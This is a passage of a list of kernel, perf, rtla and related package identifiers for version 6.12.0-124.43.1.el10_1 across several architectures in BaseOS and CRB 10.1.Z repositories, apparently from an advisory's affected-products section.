"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
